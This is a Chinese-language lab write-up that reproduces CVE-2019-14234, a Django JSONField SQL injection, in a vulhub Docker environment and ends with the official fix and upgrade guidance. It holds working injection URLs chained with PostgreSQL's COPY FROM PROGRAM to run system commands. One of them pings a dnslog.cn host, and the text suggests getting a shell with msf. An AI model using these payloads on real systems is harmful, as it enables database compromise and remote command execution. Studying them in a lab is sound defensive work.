CVE-2019-14234(Django JSONField/HStoreField SQL注入漏洞)
漏洞描述
1.漏洞编号:CVE-2019-14234
2.影响版本:
1.11.x before 1.11.23
2.1.x before 2.1.11
2.2.x before 2.2.4
3.漏洞产生原因:
Django在2019年8月1日发布了一个安全更新,修复了在JSONField、HStoreField两个模型字段中存在的SQL注入漏洞。
参考链接:
- https://www.djangoproject.com/weblog/2019/aug/01/security-releases/
- https://www.leavesongs.com/PENETRATION/django-jsonfield-cve-2019-14234.html
启动环境:docker-compose up -d
vulnIP:192.168.1.108
环境启动后,访问`http://your-ip:8000`即可看到Django默认首页。
漏洞发现
关注Django的版本
漏洞利用
首先登陆后台`http://your-ip:8000/admin/`,用户名密码为`admin`、`a123123123`。
登陆后台后,进入模型`Collection`的管理页面`http://your-ip:8000/admin/vuln/collection/`:
然后在GET参数中构造`detail__a'b=123`提交,其中`detail`是模型`Collection`中的JSONField:
http://your-ip:8000/admin/vuln/collection/?detail__a%27b=123
可见,单引号已注入成功,SQL语句报错:
CVE-2019-9193:具有数据库服务器文件读取权限的攻击者可以利用此漏洞执行任意系统命令,该漏洞由 PostgreSQL 引发
思路稍加扩展,我们可以利用CVE-2019-14234(SQL注入漏洞)向服务器传送包含CVE-2019-9193(命令执行漏洞)系统命令的SQL语句,从而利用SQL语句,执行任意系统命令。
下一步结合CVE-2019-9193我们尝试执行命令,构造shell,创建cmd_exec
http://192.168.1.109:8000/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcreate%20table%20cmd_exec(cmd_output%20text)--%20
页面结果虽然报错,但是报错原因是no results to fetch,说明我们的语句已经执行
然后用dnslog检测是否可以执行命令
http://192.168.1.108:8000/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcopy%20cmd_exec%20FROM%20PROGRAM%20%27ping%20a5ukxy.dnslog.cn%27--%20
成功检测到流量
复现环境里的postgresql数据库docker没对外的端口映射,如果开了或者真实环境里,还可以结合msf通过CVE-2019-9193来getshell
构造命令执行语句
http://192.168.1.109:8000/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcopy%20cmd_exec%20FROM%20PROGRAM%20%27touch%20/tmp/vuln.txt%27--%20%20
命令执行结果:当提示“no results to fetch”即为执行成功。
登录docker查看文件创建成功
问题汇总
1.该漏洞需要开发者使用了JSONField/HStoreField,且用户可控queryset查询时的键名,在键名的位置注入SQL语句。Django自带的后台应用Django-Admin中就存在这样的写法,我们可以直接借助它来复现漏洞。
2.因为使用vulhub提供的docker环境,环境部署之后会有两个docker实例,其中实例-1提供Django的web功能,而实例-2则提供PostgreSQL数据库功能,所以不论SQL注入的结果还是命令执行的结果,都会发生在实例-2上,实践中创建的vuln.txt也在实例_2的tmp目录下。
修复方案
1.首先来看看官方是如何修复的
首先将django/contrib/postgres/fields/hstore.py文件里面的KeyTransform类的as_sql函数中的直接传递字符传改为了将self.key_name单独使用数组进行传递,其中%%的意思为"转换说明符",其主要作用为直接转化为单个"%"符号而不需要参数。类似于\\和\
In[1]:"%%"%() Out[1]: '%' # 具体使用方法如下 In [2]: '%s %%s'%'test' Out[2]: 'test %s'
之后在django/contrib/postgres/fields/jsonb.py文件中将对self.key_name变量的返回统一改成了使用数组进行转换。并且后期在单元测试中加入了对JSONField的SQL注入测试
因此,也发现了通过JSON进行SQL注入的payload
2.Django 官方已经发布新版本修复了上述漏洞,请受影响的用户尽快升级进行防护。升级Django到 >=2.2.4、>=2.1.11、>=1.11.23版本。
Django 2.2.4下载地址:
https://www.djangoproject.com/m/releases/2.2/Django-2.2.4.tar.gz
Django 2.1.11 下载地址
https://www.djangoproject.com/m/releases/2.1/Django-2.1.11.tar.gz
Django 1.11.23 下载地址:
https://www.djangoproject.com/m/releases/1.11/Django-1.11.23.tar.gz
2021-01-24 20:19:45